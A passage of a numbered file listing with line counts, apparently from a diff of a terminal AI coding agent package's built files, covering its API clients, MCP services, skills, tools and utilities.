  1062. package/dist/services/api/errors.js +710 -0
  1063. package/dist/services/api/filesApi.js +450 -0
  1064. package/dist/services/api/firstTokenDate.js +49 -0
  1065. package/dist/services/api/gemini.js +22 -0
  1066. package/dist/services/api/geminiAdapter.js +92 -0
  1067. package/dist/services/api/geminiClient.js +522 -0
  1068. package/dist/services/api/grove.js +258 -0
  1069. package/dist/services/api/logging.js +511 -0
  1070. package/dist/services/api/memcode.js +2207 -0
  1071. package/dist/services/api/metricsOptOut.js +98 -0
  1072. package/dist/services/api/nvidiaClient.js +653 -0
  1073. package/dist/services/api/openAICompatibleClient.js +576 -0
  1074. package/dist/services/api/openRouterClient.js +636 -0
  1075. package/dist/services/api/overageCreditGrant.js +80 -0
  1076. package/dist/services/api/promptCacheBreakDetection.js +442 -0
  1077. package/dist/services/api/reasoning.js +94 -0
  1078. package/dist/services/api/referral.js +195 -0
  1079. package/dist/services/api/sessionIngress.js +323 -0
  1080. package/dist/services/api/ultrareviewQuota.js +28 -0
  1081. package/dist/services/api/usage.js +38 -0
  1082. package/dist/services/api/withRetry.js +522 -0
  1083. package/dist/services/autoDream/autoDream.js +215 -0
  1084. package/dist/services/autoDream/config.js +14 -0
  1085. package/dist/services/autoDream/consolidationLock.js +89 -0
  1086. package/dist/services/autoDream/consolidationPrompt.js +64 -0
  1087. package/dist/services/awaySummary.js +63 -0
  1088. package/dist/services/compact/apiMicrocompact.js +89 -0
  1089. package/dist/services/compact/autoCompact.js +216 -0
  1090. package/dist/services/compact/cachedMCConfig.js +4 -0
  1091. package/dist/services/compact/cachedMicrocompact.js +55 -0
  1092. package/dist/services/compact/compact.js +1132 -0
  1093. package/dist/services/compact/compactWarningHook.js +11 -0
  1094. package/dist/services/compact/compactWarningState.js +13 -0
  1095. package/dist/services/compact/grouping.js +23 -0
  1096. package/dist/services/compact/microCompact.js +296 -0
  1097. package/dist/services/compact/postCompactCleanup.js +36 -0
  1098. package/dist/services/compact/prompt.js +327 -0
  1099. package/dist/services/compact/reactiveCompact.js +26 -0
  1100. package/dist/services/compact/sessionMemoryCompact.js +364 -0
  1101. package/dist/services/compact/snipCompact.js +8 -0
  1102. package/dist/services/compact/snipProjection.js +6 -0
  1103. package/dist/services/compact/timeBasedMCConfig.js +15 -0
  1104. package/dist/services/contextCollapse/index.js +37 -0
  1105. package/dist/services/contextCollapse/operations.js +6 -0
  1106. package/dist/services/contextCollapse/persist.js +5 -0
  1107. package/dist/services/diagnosticTracking.js +270 -0
  1108. package/dist/services/extractMemories/extractMemories.js +287 -0
  1109. package/dist/services/extractMemories/prompts.js +119 -0
  1110. package/dist/services/internalLogging.js +58 -0
  1111. package/dist/services/lsp/LSPClient.js +301 -0
  1112. package/dist/services/lsp/LSPDiagnosticRegistry.js +224 -0
  1113. package/dist/services/lsp/LSPServerInstance.js +292 -0
  1114. package/dist/services/lsp/LSPServerManager.js +260 -0
  1115. package/dist/services/lsp/config.js +52 -0
  1116. package/dist/services/lsp/manager.js +148 -0
  1117. package/dist/services/lsp/passiveFeedback.js +193 -0
  1118. package/dist/services/mcp/InProcessTransport.js +42 -0
  1119. package/dist/services/mcp/MCPConnectionManager.js +59 -0
  1120. package/dist/services/mcp/SdkControlTransport.js +59 -0
  1121. package/dist/services/mcp/auth.js +1723 -0
  1122. package/dist/services/mcp/channelAllowlist.js +36 -0
  1123. package/dist/services/mcp/channelNotification.js +141 -0
  1124. package/dist/services/mcp/channelPermissions.js +98 -0
  1125. package/dist/services/mcp/client.js +2269 -0
  1126. package/dist/services/mcp/config.js +1028 -0
  1127. package/dist/services/mcp/elicitationHandler.js +209 -0
  1128. package/dist/services/mcp/envExpansion.js +22 -0
  1129. package/dist/services/mcp/headersHelper.js +88 -0
  1130. package/dist/services/mcp/mcpStringUtils.js +41 -0
  1131. package/dist/services/mcp/memcodeProxy.js +106 -0
  1132. package/dist/services/mcp/normalization.js +11 -0
  1133. package/dist/services/mcp/oauthPort.js +51 -0
  1134. package/dist/services/mcp/officialRegistry.js +50 -0
  1135. package/dist/services/mcp/types.js +123 -0
  1136. package/dist/services/mcp/useManageMCPConnections.js +770 -0
  1137. package/dist/services/mcp/utils.js +314 -0
  1138. package/dist/services/mcp/vscodeSdkMcp.js +85 -0
  1139. package/dist/services/mcp/xaa.js +301 -0
  1140. package/dist/services/mcp/xaaIdpLogin.js +329 -0
  1141. package/dist/services/mcpServerApproval.js +28 -0
  1142. package/dist/services/memcodeLimits.js +318 -0
  1143. package/dist/services/memcodeLimitsHook.js +21 -0
  1144. package/dist/services/mockRateLimits.js +585 -0
  1145. package/dist/services/notifier.js +115 -0
  1146. package/dist/services/oauth/auth-code-listener.js +152 -0
  1147. package/dist/services/oauth/client.js +372 -0
  1148. package/dist/services/oauth/crypto.js +20 -0
  1149. package/dist/services/oauth/getOauthProfile.js +48 -0
  1150. package/dist/services/oauth/index.js +120 -0
  1151. package/dist/services/openAIVoiceSTT.js +242 -0
  1152. package/dist/services/plugins/PluginInstallationManager.js +134 -0
  1153. package/dist/services/plugins/pluginCliCommands.js +205 -0
  1154. package/dist/services/plugins/pluginOperations.js +657 -0
  1155. package/dist/services/policyLimits/index.js +444 -0
  1156. package/dist/services/policyLimits/types.js +10 -0
  1157. package/dist/services/preventSleep.js +103 -0
  1158. package/dist/services/providers/catalog.js +141 -0
  1159. package/dist/services/rateLimitMessages.js +202 -0
  1160. package/dist/services/rateLimitMocking.js +85 -0
  1161. package/dist/services/remoteManagedSettings/index.js +406 -0
  1162. package/dist/services/remoteManagedSettings/securityCheck.js +48 -0
  1163. package/dist/services/remoteManagedSettings/syncCache.js +51 -0
  1164. package/dist/services/remoteManagedSettings/syncCacheState.js +53 -0
  1165. package/dist/services/remoteManagedSettings/types.js +13 -0
  1166. package/dist/services/sessionTranscript/sessionTranscript.js +8 -0
  1167. package/dist/services/settingsSync/index.js +420 -0
  1168. package/dist/services/settingsSync/types.js +29 -0
  1169. package/dist/services/skillSearch/featureCheck.js +6 -0
  1170. package/dist/services/skillSearch/localSearch.js +5 -0
  1171. package/dist/services/skillSearch/prefetch.js +13 -0
  1172. package/dist/services/skillSearch/remoteSkillLoader.js +6 -0
  1173. package/dist/services/skillSearch/remoteSkillState.js +10 -0
  1174. package/dist/services/skillSearch/signals.js +0 -0
  1175. package/dist/services/skillSearch/telemetry.js +5 -0
  1176. package/dist/services/teamMemorySync/index.js +813 -0
  1177. package/dist/services/teamMemorySync/secretScanner.js +233 -0
  1178. package/dist/services/teamMemorySync/teamMemSecretGuard.js +20 -0
  1179. package/dist/services/teamMemorySync/types.js +39 -0
  1180. package/dist/services/teamMemorySync/watcher.js +236 -0
  1181. package/dist/services/tips/tipHistory.js +19 -0
  1182. package/dist/services/tips/tipRegistry.js +583 -0
  1183. package/dist/services/tips/tipScheduler.js +42 -0
  1184. package/dist/services/tokenEstimation.js +310 -0
  1185. package/dist/services/toolUseSummary/toolUseSummaryGenerator.js +76 -0
  1186. package/dist/services/tools/StreamingToolExecutor.js +391 -0
  1187. package/dist/services/tools/toolExecution.js +1219 -0
  1188. package/dist/services/tools/toolHooks.js +454 -0
  1189. package/dist/services/tools/toolOrchestration.js +137 -0
  1190. package/dist/services/vcr.js +285 -0
  1191. package/dist/services/voice.js +436 -0
  1192. package/dist/services/voiceKeyterms.js +65 -0
  1193. package/dist/services/voiceSTTProvider.js +73 -0
  1194. package/dist/services/voiceSTTTypes.js +0 -0
  1195. package/dist/services/voiceStreamSTT.js +309 -0
  1196. package/dist/setup.js +315 -0
  1197. package/dist/skills/bundled/assistantRoom.js +39 -0
  1198. package/dist/skills/bundled/backgroundSession.js +27 -0
  1199. package/dist/skills/bundled/batch.js +125 -0
  1200. package/dist/skills/bundled/debug.js +91 -0
  1201. package/dist/skills/bundled/github-auth-check/SKILL.md +31 -0
  1202. package/dist/skills/bundled/github-ci-fix/SKILL.md +24 -0
  1203. package/dist/skills/bundled/github-orient/SKILL.md +29 -0
  1204. package/dist/skills/bundled/github-pr/SKILL.md +36 -0
  1205. package/dist/skills/bundled/github-release/SKILL.md +23 -0
  1206. package/dist/skills/bundled/github-review-fix/SKILL.md +25 -0
  1207. package/dist/skills/bundled/github.js +90 -0
  1208. package/dist/skills/bundled/githubContent.js +59 -0
  1209. package/dist/skills/bundled/index.js +40 -0
  1210. package/dist/skills/bundled/keybindings.js +304 -0
  1211. package/dist/skills/bundled/loop.js +90 -0
  1212. package/dist/skills/bundled/loremIpsum.js +273 -0
  1213. package/dist/skills/bundled/remember.js +89 -0
  1214. package/dist/skills/bundled/simplify.js +74 -0
  1215. package/dist/skills/bundled/skillify.js +178 -0
  1216. package/dist/skills/bundled/stuck.js +60 -0
  1217. package/dist/skills/bundled/updateConfig.js +475 -0
  1218. package/dist/skills/bundled/verify/SKILL.md +26 -0
  1219. package/dist/skills/bundled/verify/examples/cli.md +9 -0
  1220. package/dist/skills/bundled/verify/examples/server.md +9 -0
  1221. package/dist/skills/bundled/verify.js +25 -0
  1222. package/dist/skills/bundled/verifyContent.js +12 -0
  1223. package/dist/skills/bundledSkills.js +124 -0
  1224. package/dist/skills/loadSkillsDir.js +687 -0
  1225. package/dist/skills/mcpSkillBuilders.js +16 -0
  1226. package/dist/skills/mcpSkills.js +7 -0
  1227. package/dist/src/ui/Eye.js +125 -0
  1228. package/dist/src/ui/eye-frames.js +134 -0
  1229. package/dist/src/ui/ink-primitives.js +26 -0
  1230. package/dist/src/ui/preview.js +93 -0
  1231. package/dist/state/AppState.js +155 -0
  1232. package/dist/state/AppStateStore.js +120 -0
  1233. package/dist/state/onChangeAppState.js +98 -0
  1234. package/dist/state/selectors.js +33 -0
  1235. package/dist/state/store.js +22 -0
  1236. package/dist/state/teammateViewHelpers.js +89 -0
  1237. package/dist/tasks/DreamTask/DreamTask.js +86 -0
  1238. package/dist/tasks/InProcessTeammateTask/InProcessTeammateTask.js +79 -0
  1239. package/dist/tasks/InProcessTeammateTask/types.js +20 -0
  1240. package/dist/tasks/LocalAgentTask/LocalAgentTask.js +471 -0
  1241. package/dist/tasks/LocalMainSessionTask.js +292 -0
  1242. package/dist/tasks/LocalShellTask/LocalShellTask.js +445 -0
  1243. package/dist/tasks/LocalShellTask/guards.js +6 -0
  1244. package/dist/tasks/LocalShellTask/killShellTasks.js +50 -0
  1245. package/dist/tasks/LocalWorkflowTask/LocalWorkflowTask.js +11 -0
  1246. package/dist/tasks/MonitorMcpTask/MonitorMcpTask.js +8 -0
  1247. package/dist/tasks/RemoteAgentTask/RemoteAgentTask.js +540 -0
  1248. package/dist/tasks/pillLabel.js +85 -0
  1249. package/dist/tasks/stopTask.js +62 -0
  1250. package/dist/tasks/types.js +12 -0
  1251. package/dist/tasks.js +25 -0
  1252. package/dist/tools/AgentTool/AgentTool.js +1053 -0
  1253. package/dist/tools/AgentTool/UI.js +679 -0
  1254. package/dist/tools/AgentTool/agentColorManager.js +48 -0
  1255. package/dist/tools/AgentTool/agentDisplay.js +50 -0
  1256. package/dist/tools/AgentTool/agentMemory.js +104 -0
  1257. package/dist/tools/AgentTool/agentMemorySnapshot.js +131 -0
  1258. package/dist/tools/AgentTool/agentToolUtils.js +529 -0
  1259. package/dist/tools/AgentTool/built-in/exploreAgent.js +74 -0
  1260. package/dist/tools/AgentTool/built-in/generalPurposeAgent.js +30 -0
  1261. package/dist/tools/AgentTool/built-in/memcodeGuideAgent.js +138 -0
  1262. package/dist/tools/AgentTool/built-in/planAgent.js +86 -0
  1263. package/dist/tools/AgentTool/built-in/statuslineSetup.js +143 -0
  1264. package/dist/tools/AgentTool/built-in/verificationAgent.js +149 -0
  1265. package/dist/tools/AgentTool/builtInAgents.js +56 -0
  1266. package/dist/tools/AgentTool/constants.js +13 -0
  1267. package/dist/tools/AgentTool/forkSubagent.js +127 -0
  1268. package/dist/tools/AgentTool/loadAgentsDir.js +474 -0
  1269. package/dist/tools/AgentTool/prompt.js +200 -0
  1270. package/dist/tools/AgentTool/resumeAgent.js +217 -0
  1271. package/dist/tools/AgentTool/runAgent.js +582 -0
  1272. package/dist/tools/ApplyPatchTool/ApplyPatchTool.js +359 -0
  1273. package/dist/tools/ApplyPatchTool/applyPatch.js +223 -0
  1274. package/dist/tools/ApplyPatchTool/constants.js +4 -0
  1275. package/dist/tools/AskUserQuestionTool/AskUserQuestionTool.js +258 -0
  1276. package/dist/tools/AskUserQuestionTool/prompt.js +45 -0
  1277. package/dist/tools/BashTool/BashTool.js +887 -0
  1278. package/dist/tools/BashTool/BashToolResultMessage.js +174 -0
  1279. package/dist/tools/BashTool/UI.js +155 -0
  1280. package/dist/tools/BashTool/bashCommandHelpers.js +164 -0
  1281. package/dist/tools/BashTool/bashPermissions.js +1606 -0
  1282. package/dist/tools/BashTool/bashSecurity.js +1483 -0
  1283. package/dist/tools/BashTool/commandSemantics.js +81 -0
  1284. package/dist/tools/BashTool/commentLabel.js +9 -0
  1285. package/dist/tools/BashTool/destructiveCommandWarning.js +82 -0
  1286. package/dist/tools/BashTool/modeValidation.js +69 -0
  1287. package/dist/tools/BashTool/pathValidation.js +819 -0
  1288. package/dist/tools/BashTool/prompt.js +317 -0
  1289. package/dist/tools/BashTool/readOnlyValidation.js +1727 -0
  1290. package/dist/tools/BashTool/sedEditParser.js +180 -0
  1291. package/dist/tools/BashTool/sedValidation.js +386 -0
  1292. package/dist/tools/BashTool/shouldUseSandbox.js +106 -0
  1293. package/dist/tools/BashTool/toolName.js +4 -0
  1294. package/dist/tools/BashTool/utils.js +150 -0
  1295. package/dist/tools/BriefTool/BriefTool.js +128 -0
  1296. package/dist/tools/BriefTool/UI.js +97 -0
  1297. package/dist/tools/BriefTool/attachments.js +73 -0
  1298. package/dist/tools/BriefTool/prompt.js +26 -0
  1299. package/dist/tools/BriefTool/upload.js +109 -0
  1300. package/dist/tools/ConfigTool/ConfigTool.js +381 -0
  1301. package/dist/tools/ConfigTool/UI.js +49 -0
  1302. package/dist/tools/ConfigTool/constants.js +4 -0
  1303. package/dist/tools/ConfigTool/prompt.js +76 -0
  1304. package/dist/tools/ConfigTool/supportedSettings.js +175 -0
  1305. package/dist/tools/EnterPlanModeTool/EnterPlanModeTool.js +106 -0
  1306. package/dist/tools/EnterPlanModeTool/UI.js +17 -0
  1307. package/dist/tools/EnterPlanModeTool/constants.js +4 -0
  1308. package/dist/tools/EnterPlanModeTool/prompt.js +157 -0
  1309. package/dist/tools/EnterWorktreeTool/EnterWorktreeTool.js +122 -0
  1310. package/dist/tools/EnterWorktreeTool/UI.js +18 -0
  1311. package/dist/tools/EnterWorktreeTool/constants.js +4 -0
  1312. package/dist/tools/EnterWorktreeTool/prompt.js +33 -0
  1313. package/dist/tools/ExitPlanModeTool/ExitPlanModeV2Tool.js +342 -0
  1314. package/dist/tools/ExitPlanModeTool/UI.js +71 -0
  1315. package/dist/tools/ExitPlanModeTool/constants.js +6 -0
  1316. package/dist/tools/ExitPlanModeTool/prompt.js +28 -0
  1317. package/dist/tools/ExitWorktreeTool/ExitWorktreeTool.js +255 -0
  1318. package/dist/tools/ExitWorktreeTool/UI.js +27 -0
  1319. package/dist/tools/ExitWorktreeTool/constants.js +4 -0
  1320. package/dist/tools/ExitWorktreeTool/prompt.js +35 -0
  1321. package/dist/tools/FileEditTool/FileEditTool.js +480 -0
  1322. package/dist/tools/FileEditTool/UI.js +228 -0
  1323. package/dist/tools/FileEditTool/constants.js +10 -0
  1324. package/dist/tools/FileEditTool/prompt.js +25 -0
  1325. package/dist/tools/FileEditTool/types.js +53 -0
  1326. package/dist/tools/FileEditTool/utils.js +440 -0
  1327. package/dist/tools/FileReadTool/FileReadTool.js +859 -0
  1328. package/dist/tools/FileReadTool/UI.js +177 -0
  1329. package/dist/tools/FileReadTool/imageProcessor.js +40 -0
  1330. package/dist/tools/FileReadTool/limits.js +35 -0
  1331. package/dist/tools/FileReadTool/prompt.js +34 -0
  1332. package/dist/tools/FileWriteTool/FileWriteTool.js +330 -0
  1333. package/dist/tools/FileWriteTool/UI.js +369 -0
  1334. package/dist/tools/FileWriteTool/prompt.js +21 -0
  1335. package/dist/tools/GlobTool/GlobTool.js +174 -0
  1336. package/dist/tools/GlobTool/UI.js +52 -0
  1337. package/dist/tools/GlobTool/prompt.js +10 -0
  1338. package/dist/tools/GrepTool/GrepTool.js +586 -0
  1339. package/dist/tools/GrepTool/UI.js +198 -0
  1340. package/dist/tools/GrepTool/prompt.js +20 -0
  1341. package/dist/tools/LSPTool/LSPTool.js +627 -0
  1342. package/dist/tools/LSPTool/UI.js +230 -0
  1343. package/dist/tools/LSPTool/formatters.js +384 -0
  1344. package/dist/tools/LSPTool/prompt.js +24 -0
  1345. package/dist/tools/LSPTool/schemas.js +86 -0
  1346. package/dist/tools/LSPTool/symbolContext.js +48 -0
  1347. package/dist/tools/ListMcpResourcesTool/ListMcpResourcesTool.js +103 -0
  1348. package/dist/tools/ListMcpResourcesTool/UI.js +21 -0
  1349. package/dist/tools/ListMcpResourcesTool/prompt.js +23 -0
  1350. package/dist/tools/MCPTool/MCPTool.js +70 -0
  1351. package/dist/tools/MCPTool/UI.js +324 -0
  1352. package/dist/tools/MCPTool/classifyForCollapse.js +584 -0
  1353. package/dist/tools/MCPTool/prompt.js +6 -0
  1354. package/dist/tools/McpAuthTool/McpAuthTool.js +155 -0
  1355. package/dist/tools/NotebookEditTool/NotebookEditTool.js +394 -0
  1356. package/dist/tools/NotebookEditTool/UI.js +76 -0
  1357. package/dist/tools/NotebookEditTool/constants.js +4 -0
  1358. package/dist/tools/NotebookEditTool/prompt.js +6 -0
  1359. package/dist/tools/PowerShellTool/PowerShellTool.js +736 -0
  1360. package/dist/tools/PowerShellTool/UI.js +101 -0
  1361. package/dist/tools/PowerShellTool/clmTypes.js +182 -0
  1362. package/dist/tools/PowerShellTool/commandSemantics.js +52 -0
  1363. package/dist/tools/PowerShellTool/commonParameters.js +22 -0
  1364. package/dist/tools/PowerShellTool/destructiveCommandWarning.js +86 -0
  1365. package/dist/tools/PowerShellTool/gitSafety.js +88 -0
  1366. package/dist/tools/PowerShellTool/modeValidation.js +202 -0
  1367. package/dist/tools/PowerShellTool/pathValidation.js +1448 -0
  1368. package/dist/tools/PowerShellTool/powershellPermissions.js +891 -0
  1369. package/dist/tools/PowerShellTool/powershellSecurity.js +625 -0
  1370. package/dist/tools/PowerShellTool/prompt.js +133 -0
  1371. package/dist/tools/PowerShellTool/readOnlyValidation.js +1230 -0
  1372. package/dist/tools/PowerShellTool/toolName.js +4 -0
  1373. package/dist/tools/REPLTool/constants.js +32 -0
  1374. package/dist/tools/REPLTool/primitiveTools.js +26 -0
  1375. package/dist/tools/ReadMcpResourceTool/ReadMcpResourceTool.js +142 -0
  1376. package/dist/tools/ReadMcpResourceTool/UI.js +28 -0
  1377. package/dist/tools/ReadMcpResourceTool/prompt.js +19 -0
  1378. package/dist/tools/RemoteTriggerTool/RemoteTriggerTool.js +142 -0
  1379. package/dist/tools/RemoteTriggerTool/UI.js +24 -0
  1380. package/dist/tools/RemoteTriggerTool/prompt.js +17 -0
  1381. package/dist/tools/ScheduleCronTool/CronCreateTool.js +136 -0
  1382. package/dist/tools/ScheduleCronTool/CronDeleteTool.js +90 -0
  1383. package/dist/tools/ScheduleCronTool/CronListTool.js +85 -0
  1384. package/dist/tools/ScheduleCronTool/UI.js +49 -0
  1385. package/dist/tools/ScheduleCronTool/prompt.js +90 -0
  1386. package/dist/tools/SendMessageTool/SendMessageTool.js +745 -0
  1387. package/dist/tools/SendMessageTool/UI.js +29 -0
  1388. package/dist/tools/SendMessageTool/constants.js +4 -0
  1389. package/dist/tools/SendMessageTool/prompt.js +66 -0
  1390. package/dist/tools/SkillTool/SkillTool.js +762 -0
  1391. package/dist/tools/SkillTool/UI.js +93 -0
  1392. package/dist/tools/SkillTool/constants.js +4 -0
  1393. package/dist/tools/SkillTool/prompt.js +181 -0
  1394. package/dist/tools/SleepTool/SleepTool.js +97 -0
  1395. package/dist/tools/SleepTool/prompt.js +19 -0
  1396. package/dist/tools/SyntheticOutputTool/SyntheticOutputTool.js +130 -0
  1397. package/dist/tools/TaskCreateTool/TaskCreateTool.js +123 -0
  1398. package/dist/tools/TaskCreateTool/constants.js +4 -0
  1399. package/dist/tools/TaskCreateTool/prompt.js +52 -0
  1400. package/dist/tools/TaskGetTool/TaskGetTool.js +116 -0
  1401. package/dist/tools/TaskGetTool/constants.js +4 -0
  1402. package/dist/tools/TaskGetTool/prompt.js +27 -0
  1403. package/dist/tools/TaskListTool/TaskListTool.js +102 -0
  1404. package/dist/tools/TaskListTool/constants.js +4 -0
  1405. package/dist/tools/TaskListTool/prompt.js +42 -0
  1406. package/dist/tools/TaskOutputTool/TaskOutputTool.js +582 -0
  1407. package/dist/tools/TaskOutputTool/constants.js +4 -0
  1408. package/dist/tools/TaskStopTool/TaskStopTool.js +109 -0
  1409. package/dist/tools/TaskStopTool/UI.js +39 -0
  1410. package/dist/tools/TaskStopTool/prompt.js +11 -0
  1411. package/dist/tools/TaskUpdateTool/TaskUpdateTool.js +311 -0
  1412. package/dist/tools/TaskUpdateTool/constants.js +4 -0
  1413. package/dist/tools/TaskUpdateTool/prompt.js +80 -0
  1414. package/dist/tools/TeamCreateTool/TeamCreateTool.js +173 -0
  1415. package/dist/tools/TeamCreateTool/UI.js +6 -0
  1416. package/dist/tools/TeamCreateTool/constants.js +4 -0
  1417. package/dist/tools/TeamCreateTool/prompt.js +116 -0
  1418. package/dist/tools/TeamDeleteTool/TeamDeleteTool.js +102 -0
  1419. package/dist/tools/TeamDeleteTool/UI.js +17 -0
  1420. package/dist/tools/TeamDeleteTool/constants.js +4 -0
  1421. package/dist/tools/TeamDeleteTool/prompt.js +19 -0
  1422. package/dist/tools/TodoWriteTool/TodoWriteTool.js +96 -0
  1423. package/dist/tools/TodoWriteTool/constants.js +4 -0
  1424. package/dist/tools/TodoWriteTool/prompt.js +185 -0
  1425. package/dist/tools/ToolSearchTool/ToolSearchTool.js +359 -0
  1426. package/dist/tools/ToolSearchTool/constants.js +4 -0
  1427. package/dist/tools/ToolSearchTool/prompt.js +65 -0
  1428. package/dist/tools/TungstenTool/TungstenTool.js +12 -0
  1429. package/dist/tools/WebBrowserTool/WebBrowserPanel.js +6 -0
  1430. package/dist/tools/WebFetchTool/UI.js +67 -0
  1431. package/dist/tools/WebFetchTool/WebFetchTool.js +261 -0
  1432. package/dist/tools/WebFetchTool/preapproved.js +219 -0
  1433. package/dist/tools/WebFetchTool/prompt.js +42 -0
  1434. package/dist/tools/WebFetchTool/utils.js +330 -0
  1435. package/dist/tools/WebSearchTool/UI.js +96 -0
  1436. package/dist/tools/WebSearchTool/WebSearchTool.js +440 -0
  1437. package/dist/tools/WebSearchTool/prompt.js +35 -0
  1438. package/dist/tools/WorkflowTool/constants.js +6 -0
  1439. package/dist/tools/XMemIngestTool/XMemIngestTool.js +158 -0
  1440. package/dist/tools/XMemIngestTool/prompt.js +16 -0
  1441. package/dist/tools/XMemRetrieveTool/XMemRetrieveTool.js +185 -0
  1442. package/dist/tools/XMemRetrieveTool/prompt.js +20 -0
  1443. package/dist/tools/XMemSearchTool/XMemSearchTool.js +190 -0
  1444. package/dist/tools/XMemSearchTool/prompt.js +14 -0
  1445. package/dist/tools/ink-render-mcp/package-lock.json +1177 -0
  1446. package/dist/tools/ink-render-mcp/package.json +13 -0
  1447. package/dist/tools/ink-render-mcp/sample/Hello.js +17 -0
  1448. package/dist/tools/ink-render-mcp/sample/Hello.snapshot.txt +6 -0
  1449. package/dist/tools/ink-render-mcp/tsconfig.runner.json +12 -0
  1450. package/dist/tools/shared/gitOperationTracking.js +169 -0
  1451. package/dist/tools/shared/spawnMultiAgent.js +687 -0
  1452. package/dist/tools/testing/TestingPermissionTool.js +69 -0
  1453. package/dist/tools/tui-vision-mcp/package-lock.json +1177 -0
  1454. package/dist/tools/tui-vision-mcp/package.json +11 -0
  1455. package/dist/tools/utils.js +23 -0
  1456. package/dist/tools.js +360 -0
  1457. package/dist/tsconfig.json +19 -0
  1458. package/dist/types/command.js +10 -0
  1459. package/dist/types/connectorText.js +6 -0
  1460. package/dist/types/generated/events_mono/claude_code/v1/claude_code_internal_event.js +535 -0
  1461. package/dist/types/generated/events_mono/common/v1/auth.js +41 -0
  1462. package/dist/types/generated/events_mono/growthbook/v1/growthbook_experiment_event.js +115 -0
  1463. package/dist/types/generated/google/protobuf/timestamp.js +36 -0
  1464. package/dist/types/hooks.js +136 -0
  1465. package/dist/types/ids.js +15 -0
  1466. package/dist/types/logs.js +12 -0
  1467. package/dist/types/message.js +0 -0
  1468. package/dist/types/notebook.js +0 -0
  1469. package/dist/types/permissions.js +18 -0
  1470. package/dist/types/plugin.js +67 -0
  1471. package/dist/types/textInputTypes.js +14 -0
  1472. package/dist/types/tools.js +0 -0
  1473. package/dist/types/utils.js +0 -0
  1474. package/dist/upstreamproxy/relay.js +265 -0
  1475. package/dist/upstreamproxy/upstreamproxy.js +195 -0
  1476. package/dist/utils/CircularBuffer.js +73 -0
  1477. package/dist/utils/Cursor.js +1103 -0
  1478. package/dist/utils/QueryGuard.js +86 -0
  1479. package/dist/utils/Shell.js +315 -0
  1480. package/dist/utils/ShellCommand.js +307 -0
  1481. package/dist/utils/abortController.js +39 -0
  1482. package/dist/utils/activityManager.js +117 -0
  1483. package/dist/utils/advisor.js +79 -0
  1484. package/dist/utils/agentContext.js +44 -0
  1485. package/dist/utils/agentId.js +42 -0
  1486. package/dist/utils/agentSwarmsEnabled.js +20 -0
  1487. package/dist/utils/agenticSessionSearch.js +195 -0
  1488. package/dist/utils/analyzeContext.js +857 -0
  1489. package/dist/utils/ansiToPng.js +212 -0
  1490. package/dist/utils/ansiToSvg.js +210 -0
  1491. package/dist/utils/api.js +478 -0
  1492. package/dist/utils/apiKeyHelper.js +11 -0
  1493. package/dist/utils/apiPreconnect.js +22 -0
  1494. package/dist/utils/appleTerminalBackup.js +102 -0
  1495. package/dist/utils/argumentSubstitution.js +67 -0
  1496. package/dist/utils/array.js +16 -0
  1497. package/dist/utils/asciicast.js +167 -0
  1498. package/dist/utils/attachments.js +2340 -0
  1499. package/dist/utils/attribution.js +234 -0
  1500. package/dist/utils/auth.js +1329 -0
  1501. package/dist/utils/authFileDescriptor.js +127 -0
  1502. package/dist/utils/authPortable.js +21 -0
  1503. package/dist/utils/autoModeDenials.js +14 -0
  1504. package/dist/utils/autoRunIssue.js +112 -0
  1505. package/dist/utils/autoUpdater.js +387 -0
  1506. package/dist/utils/aws.js +38 -0
  1507. package/dist/utils/awsAuthStatusManager.js +58 -0
  1508. package/dist/utils/axios.js +8 -0
  1509. package/dist/utils/background/remote/preconditions.js +160 -0
  1510. package/dist/utils/background/remote/remoteSession.js +49 -0
  1511. package/dist/utils/backgroundHousekeeping.js +64 -0
  1512. package/dist/utils/bash/ParsedCommand.js +213 -0
  1513. package/dist/utils/bash/ShellSnapshot.js +387 -0
  1514. package/dist/utils/bash/ast.js +1408 -0
  1515. package/dist/utils/bash/bashParser.js +3380 -0
  1516. package/dist/utils/bash/bashPipeCommand.js +140 -0
  1517. package/dist/utils/bash/commands.js +772 -0
  1518. package/dist/utils/bash/heredoc.js +283 -0
  1519. package/dist/utils/bash/parser.js +152 -0
  1520. package/dist/utils/bash/prefix.js +127 -0
  1521. package/dist/utils/bash/registry.js +24 -0
  1522. package/dist/utils/bash/shellCompletion.js +137 -0
  1523. package/dist/utils/bash/shellPrefix.js +14 -0
  1524. package/dist/utils/bash/shellQuote.js +167 -0
  1525. package/dist/utils/bash/shellQuoting.js +49 -0
  1526. package/dist/utils/bash/specs/alias.js +14 -0
  1527. package/dist/utils/bash/specs/index.js +19 -0
  1528. package/dist/utils/bash/specs/nohup.js +13 -0
  1529. package/dist/utils/bash/specs/pyright.js +91 -0
  1530. package/dist/utils/bash/specs/sleep.js +13 -0
  1531. package/dist/utils/bash/specs/srun.js +31 -0
  1532. package/dist/utils/bash/specs/time.js +13 -0
  1533. package/dist/utils/bash/specs/timeout.js +20 -0
  1534. package/dist/utils/bash/treeSitterAnalysis.js +263 -0
  1535. package/dist/utils/betas.js +244 -0
  1536. package/dist/utils/billing.js +51 -0
  1537. package/dist/utils/binaryCheck.js +33 -0
  1538. package/dist/utils/browser.js +57 -0
  1539. package/dist/utils/bufferedWriter.js +74 -0
  1540. package/dist/utils/bundledMode.js +10 -0
  1541. package/dist/utils/caCerts.js +66 -0
  1542. package/dist/utils/caCertsConfig.js +41 -0
  1543. package/dist/utils/cachePaths.js +30 -0
  1544. package/dist/utils/classifierApprovals.js +70 -0
  1545. package/dist/utils/classifierApprovalsHook.js +14 -0
  1546. package/dist/utils/cleanup.js +459 -0
  1547. package/dist/utils/cleanupRegistry.js +12 -0
  1548. package/dist/utils/cliArgs.js +25 -0
  1549. package/dist/utils/cliHighlight.js +30 -0
  1550. package/dist/utils/codeIndexing.js +105 -0
  1551. package/dist/utils/collapseBackgroundBashNotifications.js +57 -0
  1552. package/dist/utils/collapseHookSummaries.js +41 -0
  1553. package/dist/utils/collapseReadSearch.js +622 -0
  1554. package/dist/utils/collapseTeammateShutdowns.js +37 -0
  1555. package/dist/utils/color-diff-mock.js +25 -0
  1556. package/dist/utils/combinedAbortSignal.js +30 -0
  1557. package/dist/utils/commandLifecycle.js +11 -0
  1558. package/dist/utils/commitAttribution.js +572 -0
  1559. package/dist/utils/completionCache.js +131 -0
  1560. package/dist/utils/computerUse/appNames.js +110 -0
  1561. package/dist/utils/computerUse/cleanup.js +49 -0
  1562. package/dist/utils/computerUse/common.js +31 -0
  1563. package/dist/utils/computerUse/computerUseLock.js +124 -0
  1564. package/dist/utils/computerUse/drainRunLoop.js +50 -0
  1565. package/dist/utils/computerUse/escHotkey.js +35 -0
